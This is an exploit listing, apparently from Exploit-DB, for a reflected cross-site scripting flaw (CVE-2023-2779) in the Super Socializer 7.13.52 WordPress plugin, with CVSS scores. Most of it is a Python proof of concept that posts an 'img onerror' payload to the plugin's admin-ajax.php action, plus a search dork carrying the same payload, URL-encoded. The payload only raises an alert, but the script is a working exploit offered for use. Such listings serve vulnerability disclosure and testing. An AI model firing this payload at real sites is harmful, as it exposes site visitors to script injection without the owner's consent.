Super Socializer 7.13.52 - Reflected XSS

2023-06-2000:00:00

Amirhossein Bahramizadeh

www.exploit-db.com

158

xss

reflected

vulnerability

wordpress

plugin

security

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.6

Confidence

High

EPSS

0.009

Percentile

82.8%

JSON

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests

# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"

# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)

# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")